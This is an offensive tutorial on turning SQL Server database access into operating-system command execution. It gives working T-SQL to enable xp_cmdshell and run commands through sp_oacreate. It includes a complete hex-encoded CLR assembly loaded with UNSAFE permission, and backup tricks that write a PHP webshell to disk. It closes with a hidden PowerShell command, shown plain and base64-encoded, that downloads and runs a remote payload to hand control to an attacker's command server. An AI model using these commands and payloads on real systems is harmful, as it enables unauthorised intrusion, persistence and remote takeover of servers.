SQlserver privilege escalation method

Table of contents

Method of privilege escalation

xp_cmdshell executes system commands

sp_oacreate executes system commands

Execute system commands using the CLR

Database differential backup write webshell

Log differential backup write webshell

One-click rce utilization tool

SQLServer command execution online powershell mode

---

About SQL server injection: SQL Server manual injection method

---

The privilege escalation (command execution) of sql server mainly depends on the stored procedure that comes with sql server. Purpose: sqlserver authority —> system authority

A stored procedure is a programmable function that is created and saved in the database and is a set of precompiled T-SQL statements stored in the server. Stored procedures in the database can be seen as a simulation of the object-oriented approach in programming. It allows to control the access mode of data (stored procedure can be understood as the process of function call), use execute command to execute stored procedure.

It is mainly divided into three categories: system stored procedures, extended stored procedures, and user-defined stored procedures.

• The system stored procedure is mainly stored in the master database, prefixed with sp_, can be called in any database, and it is not necessary to add the database name before the stored procedure when calling;
• The extended stored procedure is a call to a dynamic link library (DLL) function, which is mainly used for communication between the client and the server or between the client. It is prefixed with xp_, and its usage is similar to that of the system stored procedure;
• User-defined stored procedures are stored procedures written by users of SQL Server.

Method of privilege escalation

To execute system commands, you first need to obtain the authority of the sqlserver database (usually sa), and then use the stored procedure that comes with the database to elevate the authority, from the initial sqlserver authority to the authority to execute operating system commands.

xp_cmdshell executes system commands

xp_cmdshell allows the system administrator to execute a given command in the way of operating cmd, and returns the output in text form. It is a very powerful extended stored procedure. xp_cmdshell is enabled by default in SQLserver2000 and can directly execute system commands. 2005 itself and later versions are disabled by default, so if you want to use it, you need to have the corresponding authority of the SA account, and use sp_configure to enable it.

In 2005, the authority of xp_cmdshell is generally system, while in 2008, most of them are nt authority\network service.

1. Determine whether it is sa authority, return 1 is

select is_srvrolemember('sysadmin')

2. Determine whether xp_cmdshell exists, 1 means it exists, 0 means it does not exist

select count(*) FROM master..sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'  

When the result is 0, it can be recovered by the following command

If xp_cmdshell is deleted, it can be reloaded with the following command.

dbcc addextendedproc("xp_cmdshell","xplog70.dll");

If even xplog70.dll is deleted, it can be restored by the following command (unverified)

exec master.sys.sp_addextendedproc 'xp_cmdshell', 'C:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll';

3. Open xp_cmdshell

If it returns ok, it succeeds

EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE
--关闭xp_cmdshell
exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'xp_cmdshell',0;RECONFIGURE;

If it is not enabled, an error will be reported if the command is executed directly

4. Execute system commands

exec xp_cmdshell 'whoami';
--或
EXEC master..xp_cmdshell 'whoami'

You can see that the current user permissions are network service permissions, or system permissions. This is related to the user permissions set to start the service during the installation process. It is recommended to use network service permissions. After all, if it is system permissions, then for attackers The operation of raising the right is saved, as shown in the figure:

If the "sql server database engine" service selects the system account during the installation process

Then when the command is executed, it is the system permission

sp_oacreate executes system commands

When xp_cmdshell is deleted, you can use the COM component SP_OACREATE in SQLServer to execute system commands. The principle is that SQL Server provides some functions to access OLE objects, namely sp_oacreate and sp_oamethod. You can use them to call OLE controls to indirectly obtain a shell.

1. Use the following command to check whether sp_oacreate can be used to execute system commands, and if the echo is 0, it can be used

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'whoami'

If SQLServer blocks access to the process 'sys.sp_OACreate' of the component 'Ole Automation Procedures', you can use the following command to open it.

EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;

2. Execute the command

This is not as useful as xp_cmdshell is that it cannot be echoed. You can redirect the result of executing the command and then view it in the system, such as the command:

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\test.txt' 

Can we then use the type command to view the contents of the file? The answer is no! As follows, there is no echo when viewing the file content. You can only log in to the system to view

Execute system commands using the CLR

Beginning with SQL Server 2005 (9.x), SQL Server integrates the common language runtime (CLR) components of the .NET Framework for Microsoft Windows. This means that stored procedures, triggers, user-defined types, user-defined functions, user-defined aggregates, and streaming table-valued functions can now be written in any .NET Framework language, including Microsoft Visual Basic .NET and Microsoft Visual C#.

This method is cumbersome. You need to create the project code according to the target and then compile it. Of course, the code of the compiled file is directly used here.

--1.启用MSSQL CLR功能，为了导入了不安全的程序集，我们还需要将数据库标记为安全。
exec sp_configure 'show advanced options', 1;RECONFIGURE;Exec sp_configure 'clr enabled', 1;RECONFIGURE;ALTER DATABASE [master] SET TRUSTWORTHY ON;

--2.导入程序集（单独执行）
CREATE ASSEMBLY [WarSQLKit] AUTHORIZATION [dbo] FROM 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c0103006643f55f0000000000000000e00022200b013000000e00000006000000000000022d0000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000b02c00004f00000000400000b803000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000080d000000200000000e000000020000000000000000000000000000200000602e72737263000000b8030000004000000004000000100000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000001400000000000000000000000000004000004200000000000000000000000000000000e42c00000000000048000000020005005c220000540a00000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000be280e00000a72010000706f0f00000a280e00000a7243000070725300007002281000000a28020000066f0f00000a2a1b300600a40100000100001173040000060a731100000a0b076f1200000a026f1300000a03281400000a2d0c076f1200000a036f1500000a076f1200000a176f1600000a076f1200000a176f1700000a076f1200000a166f1800000a076f1200000a176f1900000a076f1200000a176f1a00000a06731b00000a7d010000040706fe0605000006731c00000a6f1d00000a140c076f1e00000a26076f1f00000a076f2000000a6f2100000a0c076f2200000ade390d280e00000a1b8d160000012516725d000070a2251702a2251803a225197291000070a2251a096f2300000aa2282400000a6f0f00000ade00076f2500000a2d1a280e00000a067b010000046f2600000a6f0f00000a3895000000731b00000a130408281400000a2d091104086f2700000a26067b010000046f2800000a2c20110472970000706f2700000a261104067b010000046f2600000a6f2700000a26280e00000a1c8d16000001251602a2251703a2251872af000070a22519076f2500000a13051205282900000aa2251a7291000070a2251b1104252d0426142b056f2600000aa2282400000a6f0f00000a067b010000046f2600000a2a011000000000870021a80039100000011e02282a00000a2a4e027b01000004046f2b00000a6f2700000a262a42534a4201000100000000000c00000076322e302e35303732370000000005006c00000038030000237e0000a4030000a804000023537472696e6773000000004c080000e80000002355530034090000100000002347554944000000440900001001000023426c6f620000000000000002000001571502000902000000fa013300160000010000001c000000030000000100000005000000050000002b0000000d000000010000000100000003000000010000000000b1020100000000000600ed01ae0306005a02ae03060038019b030f00ce03000006004c01cd020600d001cd020600b101cd0206004102cd0206000d02cd0206002602cd0206007901cd0206009401cd0206003004c6020a0063014e030e0009049b030600df02c602060020036e0406001d01ae030e00ee039b030a007a044e030a0015014e0306008e02c6020e00f7029b030e00c4009b030e0035039b0306000803360006001503360006002700c602000000002d00000000000100010001001000dd030000350001000100030110000100000035000100040006006404740050200000000096005e007800010080200000000096008b001a00020040220000000086189503060004004022000000008618950306000400482200000000830016007d000400000001007d0000000100e400000002001f04000001002e03000002000404090095030100110095030600190095030a00290095031000310095031000390095031000410095031000490095031000510095031000590095031000610095031000710095030600910095030600a1000c011500a90096001000b10029041a007900950306007900e9022d00b900d7001000b10098043200b90011041000b90085043700b900b4003c00b90078023700b9007b033700b90049043700890095030600c90095034200790066004800790043044e007900ed000600790069035200d900810057007900370406008100a8005700b10029045b0079009b00610069008c025700890001016500890095026100e1008c02570069009503060099004c005700200063000b012e000b0084002e0013008d002e001b00ac002e002300b5002e002b00cb002e003300cb002e003b00cb002e004300d1002e004b00e1002e005300cb002e005b00fe0063006b000b012000048000000100000000000000000000000000a00200000200000000000000000000006b005500000000000200000000000000000000006b004000000000000200000000000000000000006b00c60200000000030002000000003c3e635f5f446973706c6179436c617373315f30003c52756e436f6d6d616e643e625f5f3000496e743332003c4d6f64756c653e0053797374656d2e494f0053797374656d2e44617461006765745f44617461006d73636f726c696200436d6445786563006164645f4f757470757444617461526563656976656400636d640052656164546f456e640052756e436f6d6d616e640053656e64006765745f45786974436f6465006765745f4d657373616765007365745f57696e646f775374796c650050726f6365737357696e646f775374796c65007365745f46696c654e616d650066696c656e616d6500426567696e4f7574707574526561644c696e6500417070656e644c696e65006765745f506970650053716c5069706500436f6d70696c657247656e6572617465644174747269627574650044656275676761626c6541747472696275746500417373656d626c795469746c654174747269627574650053716c50726f63656475726541747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7946696c6556657273696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c794465736372697074696f6e41747472696275746500436f6d70696c6174696f6e52656c61786174696f6e7341747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c79436f6d70616e794174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007365745f5573655368656c6c4578656375746500546f537472696e67006765745f4c656e6774680057617253514c4b69744d696e696d616c0057617253514c4b69744d696e696d616c2e646c6c0053797374656d0053797374656d2e5265666c656374696f6e00457863657074696f6e006765745f5374617274496e666f0050726f636573735374617274496e666f0053747265616d526561646572005465787452656164657200537472696e674275696c6465720073656e646572004461746152656365697665644576656e7448616e646c6572004d6963726f736f66742e53716c5365727665722e536572766572006765745f5374616e646172644572726f72007365745f52656469726563745374616e646172644572726f72002e63746f720053797374656d2e446961676e6f73746963730053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f6465730053746f72656450726f63656475726573004461746152656365697665644576656e744172677300617267730050726f63657373007365745f417267756d656e747300617267756d656e747300436f6e636174004f626a6563740057616974466f7245786974005374617274007365745f52656469726563745374616e646172644f7574707574007374644f75747075740053797374656d2e546578740053716c436f6e74657874007365745f4372656174654e6f57696e646f770049734e756c6c4f72456d707479000000004143006f006d006d0061006e0064002000690073002000720075006e006e0069006e0067002c00200070006c006500610073006500200077006100690074002e00000f63006d0064002e00650078006500000920002f006300200000334f00530020006500720072006f00720020007700680069006c006500200065007800650063007500740069006e006700200000053a002000001753007400640020006f00750074007000750074003a0000372000660069006e00690073006800650064002000770069007400680020006500780069007400200063006f006400650020003d0020000000c1b0e79eb8eb6348be1e0c1d83c2d05800042001010803200001052001011111042001010e04000012550500020e0e0e0c0706120c123d0e1241124508042000125d040001020e0420010102052001011161052002011c180520010112650320000204200012690320000e0500010e1d0e0320000805200112450e08b77a5c561934e08903061245040001010e062002011c124d0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f7773010801000200000000001501001057617253514c4b69744d696e696d616c00000501000000000f01000a457975702043454c494b00001c010017687474703a2f2f6579757063656c696b2e636f6d2e747200000c010007312e302e302e3000000401000000d82c00000000000000000000f22c0000002000000000000000000000000000000000000000000000e42c0000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000005c03000000000000000000005c0334000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004bc020000010053007400720069006e006700460069006c00650049006e0066006f0000009802000001003000300030003000300034006200300000001a000100010043006f006d006d0065006e007400730000000000000022000100010043006f006d00700061006e0079004e0061006d00650000000000000000004a0011000100460069006c0065004400650073006300720069007000740069006f006e0000000000570061007200530051004c004b00690074004d0069006e0069006d0061006c0000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e00300000004a001500010049006e007400650072006e0061006c004e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c00000000005400180001004c006500670061006c0043006f007000790072006900670068007400000068007400740070003a002f002f006500790075007000630065006c0069006b002e0063006f006d002e007400720000002a00010001004c006500670061006c00540072006100640065006d00610072006b00730000000000000000005200150001004f0072006900670069006e0061006c00460069006c0065006e0061006d0065000000570061007200530051004c004b00690074004d0069006e0069006d0061006c002e0064006c006c000000000036000b000100500072006f0064007500630074004e0061006d0065000000000045007900750070002000430045004c0049004b0000000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000043d00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 WITH PERMISSION_SET = UNSAFE;

--3.创建存储过程（单独执行）
CREATE PROCEDURE sp_cmdExec @Command [nvarchar](4000) WITH EXECUTE AS CALLER AS EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec;

--4.执行命令
EXEC sp_cmdExec 'ipconfig';

--删除该程序集
DROP PROCEDURE sp_cmdExec;DROP ASSEMBLY [WarSQLKit];

Database differential backup write webshell

Differential backup database get webshell. In sqlserver, both dbo and sa permissions have backup database permissions. We can back up the database as an asp file, so that we can generate a webpage pony through the backup database function of mssqlserver. In the actual situation, we have to get the absolute path of the website first, and then write the shell

prerequisite

• Has db_owner permission
• Know the absolute path of the web directory

For the convenience of demonstration, a php file is directly generated here. in two steps

--第一步
create DATABASE Testdb;
--第二步
backup database Testdb to disk = 'c:\test2.bak';
use Testdb;
create table [dbo].[Testdb] ([cmd] [image]);
insert into Testdb(cmd) values(0x3c3f70687020706870696e666f28293b3f3e);
--3c3f70687020706870696e666f28293b3f3e为16进制的<?php phpinfo();?>
backup database Testdb to disk='C:\\phpinfo.php' WITH DIFFERENTIAL,FORMAT;

Generate two files, phpinfo.php is webshell

Log differential backup write webshell

Whether it is log backup or differential backup, a Trojan horse is written in a sentence during the backup process.

The requirement for LOG backup is that his database has been backed up, and the recovery mode must be full mode, at least in 2008. The advantage of log backup is that the file size of the backed up webshell is very small

create database Testdb      --新建数据库Testdb
alter database Testdb set RECOVERY FULL;   --修改数据库恢复模式为 完整模式
create table cmd (a image);        --创建一张表cmd，只有一个列 a，类型为image
backup log Testdb to disk= 'C:\\1.php' with init;   --备份表到指定路径
insert into cmd (a) values(0x3c3f706870706870696e666f28293b3f3e);  --插入一句话到cmd表里
backup log Testdb to disk='C:\\phpinfo.php';   --把操作日志备份到指定文件

Generate phpinfo.php

One-click rce utilization tool

Tools for using mssql: GitHub - SafeGroceryStore/MDUT: MDUT - Multiple Database Utilization Tools

SQLServer command execution online powershell mode

Generally, due to the problem of quotation marks, when the command is executed, the input powershell code cannot be executed to go online, and it needs to be encoded first.

The powershell online code is as follows

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.10.5:80/a'))"

base64 encoding

The content of "IEX ((new-object net.webclient).downloadstring('http://192.168.10.5:80/a'))" needs to be base64-encoded using powershell. Put its content on $fileContent

$fileContent = "IEX ((new-object net.webclient).downloadstring('http://192.168.10.5:80/a'))";$bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent);$encodedCommand = [Convert]::ToBase64String($bytes);echo $encodedCommand

The final result is as follows

powershell.exe -nop -w hidden -exec bypass -Enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4ANQA6ADgAMAAvAGEAJwApACkA

Enter the encoded command directly into the following command execution box, and go online cs